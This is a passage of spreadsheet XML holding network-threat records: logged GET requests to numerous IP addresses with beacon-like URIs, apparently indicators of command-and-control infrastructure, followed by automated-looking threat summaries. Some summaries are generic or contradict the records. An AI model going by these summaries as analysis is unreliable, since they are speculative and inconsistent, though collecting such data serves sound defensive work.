'/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aZh9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/bX3p'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Y6Xu'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Bpr9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/yRKF'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/di9W'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/OXoF'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/eJcK'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/hWXE'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/DvRQ'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/uWW9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/clAM'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/8joK'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/5rrD'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/JVyC'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Nr4h'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/1Csv'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/VLJp'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/XGYe'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/TFjX'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/a5sT'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/fOt3'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/AvOW'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/ZGRi'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/LmOU'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/6WWx'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/vTEN'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/bjMC'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/y3XY'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/TQVa'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/L1tl'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/u9WW'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/DdRc'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/GqYK'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/4Oko'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/xJIQ'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/6wDl'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/EIjd'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/eK8u'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/UKcY'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/RLKt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/bZJV'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/ZEeY'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Q7lh'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Giy4'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/yTZ5'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/kDdJ'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/vGXG'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/oOIV'}}&amp;"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9499:3856"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="An HTTP GET request was sent to an unusual endpoint on a secure server, potentially indicating reconnaissance or scanning activity by an attacker using a fake user agent. The request is being compressed with gzip, which may be used for data exfiltration. The user agent mimics a legitimate browser but could be a decoy. &amp;&amp; This data suggests a potential malicious GET request to an unknown URI, possibly using gzip compression for obfuscation, originating from an IP address with no known legitimate service on port 443. The User-Agent header is identical to that of a legitimate browser, but this could be an attempt to evade detection. &amp;&amp; An unknown user attempted to access a specific URI on a server, identifying themselves as a Mozilla Firefox browser but with an unusual User-Agent string. This could be a reconnaissance or testing phase of a potential attack. The request was made over a secure connection. &amp;&amp; An attacker is attempting to connect to a secure web server on a specific IP address, potentially trying to exploit vulnerabilities or access sensitive information. The User-Agent header suggests the attack is coming from a simulated browser, possibly indicating a botnet or automated scanning tool. A GET request is being made to an unusual URI path. &amp;&amp; A malicious actor is attempting to access a sensitive resource on the system by sending an HTTPS request with a specific user agent and host header, indicating potential reconnaissance or exploitation activity. The use of gzip encoding suggests the attacker may be trying to compress data for easier transmission or hiding malware. This could be a prelude to a more targeted attack. &amp;&amp; A potential port scanning activity is detected, with the attacker attempting to connect to a service on port 443 of a server with IP address 38.60.224.106 using a browser-like User-Agent for disguise. The connection attempt is made from an unknown source and may be part of a reconnaissance phase before launching further attacks. &amp;&amp; This data indicates a potential malicious GET request to an unknown endpoint, possibly a command and control server, originating from a suspicious IP address, likely attempting to exploit the service for unauthorized purposes. The request is encoded using gzip and sent through HTTPS, suggesting it may be an attempt to bypass security measures. The user agent string appears legitimate but could be spoofed or altered to deceive security systems. &amp;&amp; A GET request was made to a specific URI, potentially attempting to exploit a vulnerability or serve malware, with a suspicious User-Agent and connection setup. The Host header suggests an attempt to connect to a server on a non-standard port. This could be part of a reconnaissance or attack phase. &amp;&amp; A potential web server scanning or enumeration activity has been detected, where a client is attempting to connect to an IP address on port 443 and requesting data from a specific URI in order to identify vulnerabilities. The use of a generic user agent may indicate an automated tool is being used. This could be a reconnaissance effort before launching a more targeted attack. &amp;&amp; This indicates that an attempt was made to connect to the service but did not include any HTTPS protocol information making it likely a reconnaissance or scanning activity attempting to identify available services. The lack of HTTPS protocol information suggests that the attacker is probing for weaknesses. This behavior can be indicative of malicious intent. &amp;&amp; A GET request was sent to a server from an IP address, attempting to access the file or resource located at '/KiRV'. This could be part of a reconnaissance attempt or an exploit of some sort. The User-Agent header is spoofed to match a legitimate browser. &amp;&amp; A potential malicious activity is a GET request to a specific URL, likely attempting to access sensitive information on the target system. The user-agent mimics a legitimate browser, which could be an attempt to evade detection. This may be a reconnaissance probe or a precursor to further attacks. &amp;&amp; A potential malware scanner has scanned the service, likely for vulnerability exploitation. The scanner is using a fake user agent to mimic legitimate traffic. This activity may be reconnaissance or a prelude to further attacks. &amp;&amp; A GET request is being sent to a specific URL on port 443, suggesting an attempt to access a potentially malicious website via HTTPS connection. The user agent and host IP are suspiciously generic. This could be a reconnaissance or phishing activity. &amp;&amp; A GET request is made to an unusual URI path, possibly attempting to access unauthorized data or trigger a malicious response, indicating potential scanning or exploitation activity. The User-Agent header matches the profile of a legitimate browser, suggesting an attempt to blend in with regular traffic. This may be part of a reconnaissance operation. &amp;&amp; An unknown user is attempting to access a web resource located at the specified URI, using a disguised user agent and potentially encrypted data. This could be an attempt to exploit a vulnerability or scan for sensitive information. The request appears to be legitimate but its unusual characteristics raise suspicions. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; An unknown user from IP address 38.54.115.66 accessed a specific URL, possibly attempting to exploit it for malicious purposes. The User-Agent header suggests the activity is likely automated and disguised as a legitimate browser request. This may be an attempt at web scraping or exploiting a vulnerability. &amp;&amp; Possible malicious activity: An unknown host connected to the service and sent a GET request, potentially attempting to access unauthorized content, with some characteristics suggesting it may be automated or scripted. The user agent is a commonly used browser type but could also be 